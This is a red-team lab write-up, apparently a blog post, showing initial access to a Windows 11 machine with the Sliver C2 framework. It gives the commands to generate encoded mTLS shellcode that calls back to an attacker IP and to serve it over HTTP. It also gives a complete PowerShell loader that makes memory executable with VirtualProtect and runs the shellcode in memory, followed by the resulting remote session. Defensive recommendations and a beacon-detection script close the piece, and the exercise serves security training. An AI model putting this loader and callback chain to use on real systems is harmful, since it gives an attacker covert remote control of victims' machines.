SLIVER C&C

This report documents the procedure for gaining initial access to a simulated Windows 11 target machine using the Sliver C2 framework and a PowerShell in-memory injection technique as part of an ethical penetration testing exercise.

First of all, we update the system with apt update -y, which ensures all necessary tools and packages are up to date, as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# apt update -y
Des:1 http://kali.download/kali kali-rolling InRelease [34,0 kB]
Des:2 http://kali.download/kali kali-rolling/main amd64 Packages [21,0 MB]
Des:3 http://kali.download/kali kali-rolling/main amd64 Contents (deb) [50,6 MB]
Des:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [119 kB]
Des:5 http://kali.download/kali kali-rolling/contrib amd64 Contents (deb) [326 kB]
Des:6 http://kali.download/kali kali-rolling/non-free amd64 Packages [201 kB]
Des:7 http://kali.download/kali kali-rolling/non-free amd64 Contents (deb) [911 kB]
Des:8 http://kali.download/kali kali-rolling/non-free-firmware amd64 Packages [11,3 kB]
Des:9 http://kali.download/kali kali-rolling/non-free-firmware amd64 Contents (deb) [28,4 kB]
Descargados 73,3 MB en 16s (4.675 kB/s)                                                                    
Se pueden actualizar 782 paquetes. Ejecute «apt list --upgradable» para verlos.

Next, we install Sliver with sudo apt install sliver -y, which installs the C2 framework and its cross-compilation dependencies (primarily mingw-w64), as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# sudo apt install sliver -y
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
  kde-style-oxygen-qt6  libhdf4-0-alt            libsframe1         libvpx9                            python3-wheel-whl
  libgdata-common       liboxygenstyle6-6        libsigsegv2        linux-image-6.12.25-amd64
  libgdata22            liboxygenstyleconfig6-6  libsoup-2.4-1      python3-packaging-whl
  libgeos3.13.1         libqt5ct-common1.8       libsoup2.4-common  python3-pyinstaller-hooks-contrib
Utilice «sudo apt autoremove» para eliminarlos.

Installing:
  sliver

Installing dependencies:
  binutils-mingw-w64         g++-mingw-w64-x86-64        gcc-mingw-w64-i686-posix-runtime
  binutils-mingw-w64-ucrt64  g++-mingw-w64-x86-64-posix  gcc-mingw-w64-x86-64
  g++-mingw-w64              g++-mingw-w64-x86-64-win32  gcc-mingw-w64-x86-64-posix
  g++-mingw-w64-i686         gcc-mingw-w64               gcc-mingw-w64-x86-64-posix-runtime
  g++-mingw-w64-i686-posix   gcc-mingw-w64-i686          mingw-w64
  g++-mingw-w64-i686-win32   gcc-mingw-w64-i686-posix

Paquetes sugeridos:
  gcc-14-locales

Summary:
  Upgrading: 0, Installing: 18, Removing: 0, Not Upgrading: 782
  Download size: 289 MB
  Space needed: 910 MB / 39,5 GB available

Des:1 http://http.kali.org/kali kali-rolling/main amd64 binutils-mingw-w64-ucrt64 amd64 2.44-3+12+b1 [3.475 kB]
Des:2 http://http.kali.org/kali kali-rolling/main amd64 binutils-mingw-w64 all 2.43.1-5+12 [149 kB]
Des:3 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686-posix-runtime amd64 14.2.0-19+27+b1 [12,3 MB]
Des:12 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64 all 14.2.0-17+27 [193 kB]
Des:4 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686-posix amd64 14.2.0-19+27+b1 [37,2 MB]
Des:16 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64 all 14.2.0-17+27 [193 kB]        
Des:5 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686-posix amd64 14.2.0-19+27+b1 [15,0 MB]
Des:6 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686-win32 amd64 14.2.0-19+27+b1 [15,0 MB]
Des:7 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686 all 14.2.0-17+27 [193 kB]
Des:8 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64-posix-runtime amd64 14.2.0-19+27+b1 [13,0 MB]
Des:9 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64-posix amd64 14.2.0-19+27+b1 [37,6 MB]
Des:10 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64-posix amd64 14.2.0-19+27+b1 [15,3 MB]
Des:11 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64-win32 amd64 14.2.0-19+27+b1 [15,3 MB]
Des:13 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64 all 14.2.0-17+27 [193 kB]
Des:14 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686 all 14.2.0-17+27 [193 kB]
Des:15 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64 all 14.2.0-17+27 [193 kB]
Des:17 http://kali.download/kali kali-rolling/main amd64 mingw-w64 all 12.0.0-5 [11,3 kB]
Des:18 http://kali.download/kali kali-rolling/main amd64 sliver amd64 1.5.42-0kali1 [124 MB]
Descargados 289 MB en 9s (32,3 MB/s)                                                                                         
Seleccionando el paquete binutils-mingw-w64-ucrt64 previamente no seleccionado.
(Leyendo la base de datos ... 572169 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../00-binutils-mingw-w64-ucrt64_2.44-3+12+b1_amd64.deb ...
Desempaquetando binutils-mingw-w64-ucrt64 (2.44-3+12+b1) ...
Seleccionando el paquete binutils-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../01-binutils-mingw-w64_2.43.1-5+12_all.deb ...
Desempaquetando binutils-mingw-w64 (2.43.1-5+12) ...
Seleccionando el paquete gcc-mingw-w64-i686-posix-runtime previamente no seleccionado.
Preparando para desempaquetar .../02-gcc-mingw-w64-i686-posix-runtime_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-i686-posix-runtime (14.2.0-19+27+b1) ...
Seleccionando el paquete gcc-mingw-w64-i686-posix previamente no seleccionado.
Preparando para desempaquetar .../03-gcc-mingw-w64-i686-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686-posix previamente no seleccionado.
Preparando para desempaquetar .../04-g++-mingw-w64-i686-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686-win32 previamente no seleccionado.
Preparando para desempaquetar .../05-g++-mingw-w64-i686-win32_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-i686-win32 (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686 previamente no seleccionado.
Preparando para desempaquetar .../06-g++-mingw-w64-i686_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64-i686 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-x86-64-posix-runtime previamente no seleccionado.
Preparando para desempaquetar .../07-gcc-mingw-w64-x86-64-posix-runtime_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-x86-64-posix-runtime (14.2.0-19+27+b1) ...
Seleccionando el paquete gcc-mingw-w64-x86-64-posix previamente no seleccionado.
Preparando para desempaquetar .../08-gcc-mingw-w64-x86-64-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64-posix previamente no seleccionado.
Preparando para desempaquetar .../09-g++-mingw-w64-x86-64-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64-win32 previamente no seleccionado.
Preparando para desempaquetar .../10-g++-mingw-w64-x86-64-win32_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-x86-64-win32 (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64 previamente no seleccionado.
Preparando para desempaquetar .../11-g++-mingw-w64-x86-64_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64-x86-64 (14.2.0-17+27) ...
Seleccionando el paquete g++-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../12-g++-mingw-w64_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-i686 previamente no seleccionado.
Preparando para desempaquetar .../13-gcc-mingw-w64-i686_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64-i686 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-x86-64 previamente no seleccionado.
Preparando para desempaquetar .../14-gcc-mingw-w64-x86-64_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64-x86-64 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../15-gcc-mingw-w64_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64 (14.2.0-17+27) ...
Seleccionando el paquete mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../16-mingw-w64_12.0.0-5_all.deb ...
Desempaquetando mingw-w64 (12.0.0-5) ...
Seleccionando el paquete sliver previamente no seleccionado.
Preparando para desempaquetar .../17-sliver_1.5.42-0kali1_amd64.deb ...
Desempaquetando sliver (1.5.42-0kali1) ...
Configurando g++-mingw-w64-i686-win32 (14.2.0-19+27+b1) ...
update-alternatives: utilizando /usr/bin/i686-w64-mingw32-g++-win32 para proveer /usr/bin/i686-w64-mingw32-g++ (i686-w64-mingw32-g++) en modo automático
Configurando g++-mingw-w64-x86-64-win32 (14.2.0-19+27+b1) ...
update-alternatives: utilizando /usr/bin/x86_64-w64-mingw32-g++-win32 para proveer /usr/bin/x86_64-w64-mingw32-g++ (x86_64-w64-mingw32-g++) en modo automático
Configurando gcc-mingw-w64-x86-64-posix-runtime (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-i686-posix-runtime (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-x86-64 (14.2.0-17+27) ...
Configurando binutils-mingw-w64-ucrt64 (2.44-3+12+b1) ...
Configurando sliver (1.5.42-0kali1) ...
Configurando gcc-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Configurando g++-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-i686 (14.2.0-17+27) ...
Configurando g++-mingw-w64-x86-64 (14.2.0-17+27) ...
Configurando binutils-mingw-w64 (2.43.1-5+12) ...
Configurando gcc-mingw-w64 (14.2.0-17+27) ...
Configurando g++-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Configurando g++-mingw-w64-i686 (14.2.0-17+27) ...
Configurando g++-mingw-w64 (14.2.0-17+27) ...
Configurando mingw-w64 (12.0.0-5) ...
Procesando disparadores para libc-bin (2.41-12) ...
Procesando disparadores para man-db (2.13.1-1) ...
Procesando disparadores para kali-menu (2025.3.0) ...
Scanning processes...                                                                                                         
Scanning linux images...                                                                                                      

Running kernel seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.

Before going further, we need to know our attacker IP address, which is 192.168.88.6, as you can see below:

┌──(luis㉿kali)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 08:00:27:4d:8a:0f brd ff:ff:ff:ff:ff:ff
    inet 192.168.88.6/24 brd 192.168.88.255 scope global dynamic noprefixroute eth0
       valid_lft 6987sec preferred_lft 6987sec
    inet6 fd00::93ca:187e:41e3:abd6/64 scope global temporary dynamic
       valid_lft 26sec preferred_lft 26sec
    inet6 fd00::a00:27ff:fe4d:8a0f/64 scope global dynamic mngtmpaddr noprefixroute
       valid_lft 26sec preferred_lft 26sec
    inet6 fe80::a00:27ff:fe4d:8a0f/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:77:9b:cb:94 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever

Now we start the Sliver server, through which we will obtain the shell.

┌──(root㉿kali)-[/home/luis]
└─# sliver-server

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain improvise
[*] Server v1.5.42 - kali
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

Now we generate the shellcode with our IP and the port on which we will receive the shell, as you can see below.

[server] sliver > generate --mtls 192.168.88.6:443 --format shellcode

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 1m4s
[*] Encoding shellcode with shikata ga nai ... success!
[*] Implant saved to /home/luis/VIVID_LAPAROSCOPE.bin


Running ls confirms the implant has been created in the current directory, as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# ls
CVE-2025-32463_chwoot  Escritorio    hola            microchoft.txt  password             Plantillas   reverse_shell.php  silver.txt   text.php               vulnyx_shop.txt
Descargas              friendly.txt  Imágenes        Música          password_bloodhound  prueba.elf   secretito.txt      SMS-Bomber   users1.txt             Win7Blue
docker-compose.yml     galeria.txt   jamm.txt        nc.exe          passwords.txt        Público      secretito.zip      spoofy       Vídeos
Documentos             hash          LinkedInDumper  ofuskeit.txt    persistence.txt      reverse.php  sedition.txt       ssh2john.py  VIVID_LAPAROSCOPE.bin

Now we rename the file with the following command, as you can see below:

┌──(root㉿kali)-[/home/luis]
└─# mv VIVID_LAPAROSCOPE.bin shellcode.bin

Running ls again confirms the file has been renamed in the current directory, as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# ls
CVE-2025-32463_chwoot  Escritorio    hola            microchoft.txt  password             Plantillas   reverse_shell.php  shellcode.bin  ssh2john.py  vulnyx_shop.txt
Descargas              friendly.txt  Imágenes        Música          password_bloodhound  prueba.elf   secretito.txt      silver.txt     text.php     Win7Blue
docker-compose.yml     galeria.txt   jamm.txt        nc.exe          passwords.txt        Público      secretito.zip      SMS-Bomber     users1.txt
Documentos             hash          LinkedInDumper  ofuskeit.txt    persistence.txt      reverse.php  sedition.txt       spoofy         Vídeos

Now we start a Python HTTP server on the attacker machine so that the victim machine can download the file, as you can see below. A simple HTTP server on port 5000 hosts the shellcode.bin file, simulating delivery of the malicious payload to the victim machine at IP address 192.168.88.3.

┌──(root㉿kali)-[/home/luis]
└─# python3 -m http.server 5000       
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
192.168.88.3 - - [30/Sep/2025 18:41:31] "GET / HTTP/1.1" 200 -
192.168.88.3 - - [30/Sep/2025 18:41:31] code 404, message File not found
192.168.88.3 - - [30/Sep/2025 18:41:31] "GET /favicon.ico HTTP/1.1" 404 -
192.168.88.3 - - [30/Sep/2025 18:41:53] "GET /shellcode.bin HTTP/1.1" 200 -


Now we start the mTLS listener on port 443, as you can see below.

[server] sliver > mtls --lhost 192.168.88.6 --lport 443

[*] Starting mTLS listener ...

[*] Successfully started job #1
Please select a session or beacon via `use`


On the victim machine we have to download the file, as you can see in the picture below:


IMPORTANT: THIS CODE HAS TO BE EXECUTED BY THE VICTIM

# Path to the shellcode (adjust it if necessary)
$sc = [System.IO.File]::ReadAllBytes("C:\Users\Luis\Downloads\shellcode.bin")

# Reserve memory
$ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($sc.Length)

# Copy the shellcode into memory
[System.Runtime.InteropServices.Marshal]::Copy($sc, 0, $ptr, $sc.Length)

# Change the memory protection to executable
$oldProtect = 0
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
    [DllImport("kernel32.dll")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UInt32 dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);
}
"@ | Out-Null
[Kernel32]::VirtualProtect($ptr, $sc.Length, 0x40, [ref]$oldProtect) | Out-Null

# Create a delegate to execute the shellcode
$actionType = [System.Action]
$delegate = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $actionType)

# Execute directly (no threads)
$delegate.Invoke()


Gotcha! When we execute the script we get the shell, as you can see below.

PS C:\Users\Luis\Desktop> C:\Users\Luis\Desktop\script.ps1

[*] Successfully started job #1

[*] Session d372d112 VIVID_LAPAROSCOPE - 192.168.88.3:1315 (DESKTOP-Q2TNC4F) - windows/amd64 - Tue, 30 Sep 2025 18:46:20 CEST


In addition, we can see the live sessions on our attacker machine, of which there is one, as you can see below.

[server] sliver > sessions

 ID         Transport   Remote Address      Hostname          Username   Operating System   Health  
========== =========== =================== ================= ========== ================== =========
 d372d112   mtls        192.168.88.3:1315   DESKTOP-Q2TNC4F   Luis       windows/amd64      [ALIVE]

[server] sliver > sessions -i d372d112

[*] Active session VIVID_LAPAROSCOPE (d372d112)


Now we can list the files, folders, etc., as you can see below.

[server] sliver (VIVID_LAPAROSCOPE) > ls

C:\Users\Luis\Desktop (35 items, 1.8 GiB)
=========================================
drwxrwxrwx  acreditaciones máster de hacking ético                       <dir>       Tue Mar 21 21:20:06 +0200 2023
drwxrwxrwx  active directory                                             <dir>       Thu Jul 31 16:32:29 +0200 2025
drwxrwxrwx  Azure_Courses                                                <dir>       Thu Mar 06 10:48:50 +0200 2025
drwxrwxrwx  b1 Listening                                                 <dir>       Tue Jan 28 18:31:19 +0200 2025
drwxrwxrwx  B1PET                                                        <dir>       Tue Apr 29 15:45:07 +0200 2025
drwxrwxrwx  b1Trinity                                                    <dir>       Mon May 05 16:24:08 +0200 2025
dr-xr-xr-x  ceh                                                          <dir>       Wed Jun 19 18:42:20 +0200 2024
drwxrwxrwx  CEHv12                                                       <dir>       Tue Feb 25 19:17:08 +0200 2025
-rw-rw-rw-  Configurador_FNMT_5.0.3_64bits.exe                           43.8 MiB    Wed Sep 24 19:31:04 +0200 2025
dr-xr-xr-x  Curriculum vitae                                             <dir>       Sat Sep 27 09:53:23 +0200 2025
drwxrwxrwx  curso python                                                 <dir>       Sat May 24 11:55:17 +0200 2025
drwxrwxrwx  cyberlabs                                                    <dir>       Tue Sep 23 17:04:58 +0200 2025
-rw-rw-rw-  desktop.ini                                                  282 B       Tue Jul 22 19:51:19 +0200 2025
-rw-rw-rw-  DuckDuckGo.lnk                                               2.3 KiB     Sun Apr 13 18:05:46 +0200 2025
-rw-rw-rw-  Ethernet - Acceso directo (2).lnk                            368 B       Sun Feb 04 13:40:05 +0200 2024
-rw-rw-rw-  Ethernet - Acceso directo.lnk                                358 B       Sun May 29 17:25:07 +0200 2022
-rw-rw-rw-  Ethernet - Shortcut.lnk                                      358 B       Sat Jan 20 13:03:17 +0200 2024
-rw-rw-rw-  Ethernet 3 - Acceso directo.lnk                              368 B       Sun Feb 04 13:40:02 +0200 2024
drwxrwxrwx  Examen Hacking 2ºEvaluación                                  <dir>       Tue Mar 21 12:05:59 +0200 2023
drwxrwxrwx  Expert Ethical Hacking                                       <dir>       Tue Jan 28 18:34:25 +0200 2025
-rw-rw-rw-  GUÍA TÉCNICA DE CADENA DE CUSTODIA DE EVIDENCIA DIGITAL.pdf  1.4 MiB     Wed Apr 12 11:17:40 +0200 2023
drwxrwxrwx  hacking                                                      <dir>       Tue Sep 16 15:41:19 +0200 2025
drwxrwxrwx  iCloud Photos                                                <dir>       Sun Jul 20 11:36:06 +0200 2025
-rw-rw-rw-  iCloud Photos.zip                                            1006.8 MiB  Sun Jul 20 11:26:49 +0200 2025
drwxrwxrwx  ISOS                                                         <dir>       Tue Sep 16 11:05:06 +0200 2025
drwxrwxrwx  kinomakino_Courses                                           <dir>       Tue Sep 09 16:45:14 +0200 2025
-rw-rw-rw-  metasploitable-linux-2.0.0.zip                               825.0 MiB   Thu Feb 29 11:40:12 +0200 2024
drwxrwxrwx  Normativa                                                    <dir>       Tue May 16 10:20:34 +0200 2023
drwxrwxrwx  Python                                                       <dir>       Fri Jan 26 12:13:47 +0200 2024
-rw-rw-rw-  script.ps1                                                   972 B       Tue Sep 30 18:44:26 +0200 2025
drwxrwxrwx  Scripts powershell                                           <dir>       Wed Dec 04 18:18:49 +0200 2024
drwxrwxrwx  TRABAJO FIN CURSO                                            <dir>       Mon Dec 18 20:53:31 +0200 2023
-rw-rw-rw-  vEthernet (Default Switch) - Acceso directo.lnk              390 B       Sun Feb 04 13:40:06 +0200 2024
-rw-rw-rw-  Wi-Fi - Acceso directo.lnk                                   398 B       Sun May 29 17:25:05 +0200 2022
-rw-rw-rw-  Zoom Workplace.lnk                                           1.9 KiB     Sat Sep 27 11:05:55 +0200 2025


Since we are inside the victim machine, we can create a folder, as you can see below.

[server] sliver (VIVID_LAPAROSCOPE) > mkdir pepe

[*] C:\Users\Luis\Desktop\pepe

[server] sliver (VIVID_LAPAROSCOPE) > ls

C:\Users\Luis\Desktop (36 items, 1.8 GiB)
=========================================
drwxrwxrwx  acreditaciones máster de hacking ético                       <dir>       Tue Mar 21 21:20:06 +0200 2023
drwxrwxrwx  active directory                                             <dir>       Thu Jul 31 16:32:29 +0200 2025
drwxrwxrwx  Azure_Courses                                                <dir>       Thu Mar 06 10:48:50 +0200 2025
drwxrwxrwx  b1 Listening                                                 <dir>       Tue Jan 28 18:31:19 +0200 2025
drwxrwxrwx  B1PET                                                        <dir>       Tue Apr 29 15:45:07 +0200 2025
drwxrwxrwx  b1Trinity                                                    <dir>       Mon May 05 16:24:08 +0200 2025
dr-xr-xr-x  ceh                                                          <dir>       Wed Jun 19 18:42:20 +0200 2024
drwxrwxrwx  CEHv12                                                       <dir>       Tue Feb 25 19:17:08 +0200 2025
-rw-rw-rw-  Configurador_FNMT_5.0.3_64bits.exe                           43.8 MiB    Wed Sep 24 19:31:04 +0200 2025
dr-xr-xr-x  Curriculum vitae                                             <dir>       Sat Sep 27 09:53:23 +0200 2025
drwxrwxrwx  curso python                                                 <dir>       Sat May 24 11:55:17 +0200 2025
drwxrwxrwx  cyberlabs                                                    <dir>       Tue Sep 23 17:04:58 +0200 2025
-rw-rw-rw-  desktop.ini                                                  282 B       Tue Jul 22 19:51:19 +0200 2025
-rw-rw-rw-  DuckDuckGo.lnk                                               2.3 KiB     Sun Apr 13 18:05:46 +0200 2025
-rw-rw-rw-  Ethernet - Acceso directo (2).lnk                            368 B       Sun Feb 04 13:40:05 +0200 2024
-rw-rw-rw-  Ethernet - Acceso directo.lnk                                358 B       Sun May 29 17:25:07 +0200 2022
-rw-rw-rw-  Ethernet - Shortcut.lnk                                      358 B       Sat Jan 20 13:03:17 +0200 2024
-rw-rw-rw-  Ethernet 3 - Acceso directo.lnk                              368 B       Sun Feb 04 13:40:02 +0200 2024
drwxrwxrwx  Examen Hacking 2ºEvaluación                                  <dir>       Tue Mar 21 12:05:59 +0200 2023
drwxrwxrwx  Expert Ethical Hacking                                       <dir>       Tue Jan 28 18:34:25 +0200 2025
-rw-rw-rw-  GUÍA TÉCNICA DE CADENA DE CUSTODIA DE EVIDENCIA DIGITAL.pdf  1.4 MiB     Wed Apr 12 11:17:40 +0200 2023
drwxrwxrwx  hacking                                                      <dir>       Tue Sep 16 15:41:19 +0200 2025
drwxrwxrwx  iCloud Photos                                                <dir>       Sun Jul 20 11:36:06 +0200 2025
-rw-rw-rw-  iCloud Photos.zip                                            1006.8 MiB  Sun Jul 20 11:26:49 +0200 2025
drwxrwxrwx  ISOS                                                         <dir>       Tue Sep 16 11:05:06 +0200 2025
drwxrwxrwx  kinomakino_Courses                                           <dir>       Tue Sep 09 16:45:14 +0200 2025
-rw-rw-rw-  metasploitable-linux-2.0.0.zip                               825.0 MiB   Thu Feb 29 11:40:12 +0200 2024
drwxrwxrwx  Normativa                                                    <dir>       Tue May 16 10:20:34 +0200 2023
drwxrwxrwx  pepe                                                         <dir>       Tue Sep 30 18:51:36 +0200 2025
drwxrwxrwx  Python                                                       <dir>       Fri Jan 26 12:13:47 +0200 2024
-rw-rw-rw-  script.ps1                                                   972 B       Tue Sep 30 18:44:26 +0200 2025
drwxrwxrwx  Scripts powershell                                           <dir>       Wed Dec 04 18:18:49 +0200 2024
drwxrwxrwx  TRABAJO FIN CURSO                                            <dir>       Mon Dec 18 20:53:31 +0200 2023
-rw-rw-rw-  vEthernet (Default Switch) - Acceso directo.lnk              390 B       Sun Feb 04 13:40:06 +0200 2024
-rw-rw-rw-  Wi-Fi - Acceso directo.lnk                                   398 B       Sun May 29 17:25:05 +0200 2022
-rw-rw-rw-  Zoom Workplace.lnk                                           1.9 KiB     Sat Sep 27 11:05:55 +0200 2025  

This successful Red Team exercise highlights several areas where the target's defenses could be improved:

  1. PowerShell Scripting: PowerShell's in-memory execution is a powerful evasion technique. Security teams should enable PowerShell logging (Module Logging and Script Block Logging) to capture and analyze the API calls used for injection (AllocHGlobal, VirtualProtect).
  2. Network Traffic Detection: Although mTLS traffic is encrypted, defenders should monitor for Command and Control (C2) traffic patterns, such as unusually frequent or small outgoing connections on port 443 that are characteristic of C2 beacons.
  3. Endpoint Detection and Response (EDR): The most effective defense against this attack is a modern EDR solution that can detect API hooking and suspicious memory allocation attempts (VirtualProtect changing memory permissions to executable) in real time.
  4. Application Control: Implementing robust application whitelisting or Windows Defender Application Control (WDAC) could prevent unauthorized PowerShell scripts like script.ps1 from running in the first place.
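For recommendation 2, this added example (not from the original post or from Sliver) shows the periodicity heuristic defenders apply to outbound connection records: a polling implant produces many small sessions to the same destination on port 443 at near-constant intervals, while browsing traffic does not. The records, thresholds and the 203.0.113.10 address are constructed for this example; note that it targets beacon mode, whereas the session-mode implant in this lab holds one long-lived connection and is better caught by long-duration connection monitoring.

```python
"""Beacon heuristics over outbound-connection records (constructed here, but
the shape matches a firewall or Zeek conn log): a polling C2 implant on
port 443 shows many small sessions at near-constant intervals."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, median, pstdev

MIN_CONNECTIONS = 8        # fewer is too little history to judge periodicity
MAX_JITTER_RATIO = 0.20    # pstdev/mean of inter-arrival gaps; people browse irregularly
MAX_MEDIAN_BYTES = 4096    # check-ins with no tasking carry very little data


def interarrival_seconds(timestamps):
    """Gaps between consecutive connections, in seconds."""
    ts = sorted(timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def beacon_candidates(conns):
    """Group by (src, dst, dport) and flag groups that look like periodic check-ins."""
    groups = defaultdict(list)
    for c in conns:
        groups[(c["src"], c["dst"], c["dport"])].append(c)
    findings = []
    for (src, dst, dport), rows in groups.items():
        if len(rows) < MIN_CONNECTIONS:
            continue
        gaps = interarrival_seconds(r["ts"] for r in rows)
        avg_gap = mean(gaps)
        jitter = pstdev(gaps) / avg_gap if avg_gap > 0 else float("inf")
        med_bytes = median(r["bytes"] for r in rows)
        if jitter <= MAX_JITTER_RATIO and med_bytes <= MAX_MEDIAN_BYTES:
            findings.append({"src": src, "dst": dst, "dport": dport, "count": len(rows),
                             "mean_gap_s": round(avg_gap, 1), "jitter_ratio": round(jitter, 3),
                             "median_bytes": med_bytes})
    return findings


# Constructed sample (not captured traffic). Base time is the session time from the lab;
# the implant polls about every 60 s with small jitter, browsing to 203.0.113.10 does not.
BASE = datetime(2025, 9, 30, 18, 46, 20)


def conn(src, dst, dport, offset_s, bytes_total):
    return {"ts": BASE + timedelta(seconds=offset_s), "src": src, "dst": dst,
            "dport": dport, "bytes": bytes_total}


SAMPLE_CONNS = (
    [conn("192.168.88.3", "192.168.88.6", 443, o, 768)
     for o in (0, 61, 119, 181, 240, 302, 359, 420, 481, 539, 601, 660)]
    + [conn("192.168.88.3", "203.0.113.10", 443, o, b)
       for o, b in ((0, 36900), (3, 49200), (4, 28700), (40, 123000), (300, 61500),
                    (302, 90200), (900, 32800), (1500, 205000), (1503, 45100), (2400, 36900))]
)

if __name__ == "__main__":
    for finding in beacon_candidates(SAMPLE_CONNS):
        print(finding)
```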

Thank you very much for reading this article

I hope you liked and learned something new

This article has been written for ethical purposes

Good Hack
